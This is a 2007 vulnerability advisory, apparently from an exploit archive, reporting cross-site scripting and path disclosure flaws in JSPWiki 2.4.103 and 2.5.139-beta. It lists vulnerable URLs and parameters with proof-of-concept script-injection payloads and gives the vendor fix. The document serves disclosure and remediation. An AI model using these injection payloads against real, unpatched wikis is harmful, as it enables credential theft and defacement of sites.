jspwiki-xss.txt

jspwiki-xss.txt: Posted Sep 26, 2007; Authored by Jason Kratzer; JSPWiki version 2.4.103 and 2.5.139 suffer from cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 830bba8e9a39e88c8c76e32e4b6ecaf452aa7f56f2e0051c18edb4cf2f3e2509; Download | Favorite | View

jspwiki-xss.txt

Application:  JSPWiki Multiple Vulnerabilities
Version:  2.4.103 and 2.5.139
Credit:  Jason Kratzer
Date:  9/24/2007


Background
------------------------------------------------------------
JSPWiki is wiki software built around the standard J2EE components of
Java, servlets and JSP. It was written by Janne Jalkanen and released
under the LGPL. The Sun Java System Portal Server includes it as one
of its core applications. It is primarily used for company intranets
and has an active developer community, also including the i3G
Institute of the Heilbronn University.

(Courtesy of Wikipedia: http://en.wikipedia.org/wiki/JSPWiki)



Description
------------------------------------------------------------
Multiple Cross Site Scripting vulnerabilities have been discovered
within the JSPWiki application, successfully allowing an attacker to
steal credentials, falsify posts, and persistently deface portions of
the site.  Additionally, a Local Path Disclosure vulnerability was
also discovered.



Affected Versions
------------------------------------------------------------
Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-beta.
 The Cross Site Scripting vulnerability affecting the redirect
parameter is only found in version 2.5.139-beta.



Proof of Concept

Cross Site Scripting Vulnerabilities:
------------------------------------------------------------
http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test

    Vulnerable Parameters:
        group=Test"<script>alert("Test+XSS")</script>
        members= Test"<script>alert("Test+XSS")</script>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save

    Vulnerable Parameters:
        edittime=<script>alert("Test+XSS")</script>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386737&addr=127.0.0.1&_editedtext=Test&author=AnonymousCoward&link=&ok=Save

    Vulnerable Parameters:
        edittime=<script>alert("Test+XSS")</script>
        author=<script>alert("Test+XSS")</script>
        link="><SCRIPT>alert("Test+XSS")</SCRIPT>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/UserPreferences.jsp?tab=profile&loginname=Test&password=Test&password2=Test&wikiname=Test&fullname=Test&email=Test@Test.com&ok=Save+profile&action=saveProfile
http://vulnerable-site.com/wiki/Login.jsp?tab=profile&loginname=Test&password=Test&password2=Test&wikiname=Test&fullname=Test&email=Test@Test.com&ok=Save+profile&action=saveProfile

    Vulnerable Parameters:
        loginname="><script>alert("Test+XSS")</script>
        wikiname="><script>alert("Test+XSS")</script>
        fullname="><script>alert("Test+XSS")</script>
        email="><script>alert("Test+XSS")</script>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Diff.jsp?page=Administrator&r1=-1&r2=1

    Vulnerable Parameters:
        r1=<script>alert('Test XSS")</script>
        r2=<script>alert("Test+XSS")</script>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/PageInfo.jsp?page=SystemInfo/test.jpg

    Vulnerable Parameters:
        changenote=<script>alert("Test+XSS")</script>

    Type: Stored
------------------------------------------------------------
http://vulnerable-site.com/wiki-3/Login.jsp?redirect=Main

    Vulnerable Parameter:
        redirect="><script>alert("Test+XSS")</script>

Notes:
    The redirect parameter is found in multiple places through
JSPWiki-2.5.139-beta and is vulnerable in every instance.

------------------------------------------------------------

Local Path Disclosure:

http://vulnerable-site.com/wiki/attach/Main/Insert-Uploaded-Attachment-Filename-Here?version=1000000
(Nonexistent #)

    Vulnerable Parameter;
        Version=10000000

Notes:
    The non-existent number must be between 1 and 10 character
otherwise a standard 500 error will be displayed.



Vendor Notification
------------------------------------------------------------
The JSPWiki project was notified on September 10, 2007.  Janne
Jalkanen developed and implemented a fix by September 18, 2007.



Remediation
------------------------------------------------------------
It is recommended to upgrade to JSPWiki version 2.4.104.  It is also
worth noting, the above vulnerabilities have also been fixed in the
beta release, version 2.5.139.

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

jspwiki-xss.txt

jspwiki-xss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

jspwiki-xss.txt

Share This

jspwiki-xss.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems